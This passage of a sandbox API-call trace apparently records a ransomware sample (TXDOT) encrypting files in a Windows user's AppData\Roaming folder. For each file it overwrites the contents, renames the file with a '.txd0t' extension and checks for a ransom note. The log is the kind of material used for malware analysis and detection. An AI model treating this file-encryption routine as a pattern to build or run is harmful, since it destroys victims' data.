(hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.257] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" [0072.257] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t" [0072.257] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t") returned 0 [0072.257] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx", dwFileAttributes=0x80) returned 1 [0072.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\d3inp6ei.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.258] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=75040) returned 1 [0072.258] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.258] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.258] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffed8e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.258] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x12520, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x12520, lpOverlapped=0x0) returned 1 [0072.259] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffedae0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.260] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x12520, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x12520, lpOverlapped=0x0) returned 1 [0072.260] FlushFileBuffers (hFile=0x474) returned 1 [0072.278] GetProcessHeap () returned 0xe30000 [0072.278] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xe9b648 [0072.278] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" [0072.278] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx") returned="D3INp6Ei.xlsx" [0072.278] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.278] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.279] GetProcessHeap () returned 0xe30000 [0072.279] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.279] CloseHandle (hObject=0x474) returned 1 [0072.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\d3inp6ei.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\d3inp6ei.xlsx.txd0t")) returned 1 [0072.281] SetEvent (hEvent=0x414) returned 1 [0072.281] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.287] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" [0072.287] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t" [0072.287] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t") returned 0 [0072.287] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp", dwFileAttributes=0x80) returned 1 [0072.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\et9_8drx4.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.287] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=89953) returned 1 [0072.288] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.288] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.288] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9e9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.288] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x15f60, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x15f60, lpOverlapped=0x0) returned 1 [0072.290] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffea0a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.290] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x15f60, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x15f60, lpOverlapped=0x0) returned 1 [0072.290] FlushFileBuffers (hFile=0x468) returned 1 [0072.306] GetProcessHeap () returned 0xe30000 [0072.306] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xe9b648 [0072.306] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" [0072.306] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp") returned="ET9_8drX4.bmp" [0072.306] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.306] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.307] GetProcessHeap () returned 0xe30000 [0072.307] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.307] CloseHandle (hObject=0x468) returned 1 [0072.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\et9_8drx4.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\et9_8drx4.bmp.txd0t")) returned 1 [0072.310] SetEvent (hEvent=0x414) returned 1 [0072.310] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.312] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" [0072.312] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t" [0072.312] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t") returned 0 [0072.312] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3", dwFileAttributes=0x80) returned 1 [0072.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\juype6eukhsfcwn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.314] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=13960) returned 1 [0072.314] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.314] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.314] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffc778, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.314] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x3680, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x3680, lpOverlapped=0x0) returned 1 [0072.314] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffc980, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.315] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x3680, lpOverlapped=0x0) returned 1 [0072.315] FlushFileBuffers (hFile=0x468) returned 1 [0072.328] GetProcessHeap () returned 0xe30000 [0072.328] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1580 [0072.328] StrCpyW (in: psz1=0xed1580, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" [0072.328] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3") returned="juYPe6EuKhsFCwN.mp3" [0072.328] StrCpyW (in: psz1=0xed15c8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.328] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.328] GetProcessHeap () returned 0xe30000 [0072.329] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1580 | out: hHeap=0xe30000) returned 1 [0072.329] CloseHandle (hObject=0x468) returned 1 [0072.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\juype6eukhsfcwn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\juype6eukhsfcwn.mp3.txd0t")) returned 1 [0072.330] SetEvent (hEvent=0x414) returned 1 [0072.330] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.336] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" [0072.336] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t" [0072.336] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t") returned 0 [0072.336] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg", dwFileAttributes=0x80) returned 1 [0072.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mlrbk-2k1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.336] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=85082) returned 1 [0072.336] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.337] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.337] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffeb1a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.337] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x14c50, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x14c50, lpOverlapped=0x0) returned 1 [0072.338] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffeb3b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.338] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x14c50, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x14c50, lpOverlapped=0x0) returned 1 [0072.339] FlushFileBuffers (hFile=0x47c) returned 1 [0072.458] GetProcessHeap () returned 0xe30000 [0072.458] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xe9b648 [0072.458] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" [0072.458] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg") returned="mlrbk-2k1.jpg" [0072.458] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.458] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.458] GetProcessHeap () returned 0xe30000 [0072.458] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.458] CloseHandle (hObject=0x47c) returned 1 [0072.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mlrbk-2k1.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mlrbk-2k1.jpg.txd0t")) returned 1 [0072.473] SetEvent (hEvent=0x414) returned 1 [0072.473] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.479] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" [0072.479] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t" [0072.479] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t") returned 0 [0072.479] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf", dwFileAttributes=0x80) returned 1 [0072.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pjcnbr9evqrurkxha.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.479] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=91714) returned 1 [0072.479] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.479] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.480] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe97be, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.480] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x16640, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x16640, lpOverlapped=0x0) returned 1 [0072.481] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe99c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.481] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x16640, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x16640, lpOverlapped=0x0) returned 1 [0072.482] FlushFileBuffers (hFile=0x47c) returned 1 [0072.495] GetProcessHeap () returned 0xe30000 [0072.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11a) returned 0xe9b648 [0072.495] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" [0072.495] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf") returned="PjcNBr9EvQRuRkXhA.swf" [0072.495] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.495] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.495] GetProcessHeap () returned 0xe30000 [0072.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.495] CloseHandle (hObject=0x47c) returned 1 [0072.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pjcnbr9evqrurkxha.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pjcnbr9evqrurkxha.swf.txd0t")) returned 1 [0072.498] SetEvent (hEvent=0x414) returned 1 [0072.498] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0072.503] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" [0072.503] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t" [0072.503] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t") returned 0 [0072.503] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3", dwFileAttributes=0x80) returned 1 [0072.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s8rh8_.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.504] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=93546) returned 1 [0072.504] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.504] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0072.504] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe9096, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.505] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x16d60, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x16d60, lpOverlapped=0x0) returned 1 [0072.506] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe92a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.506] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x16d60, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x16d60, lpOverlapped=0x0) returned 1 [0072.507] FlushFileBuffers (hFile=0x474) returned 1 [0072.521] GetProcessHeap () returned 0xe30000 [0072.521] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0072.521] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" [0072.521] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3") returned="s8RH8_.mp3" [0072.521] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.521] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.521] GetProcessHeap () returned 0xe30000 [0072.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: 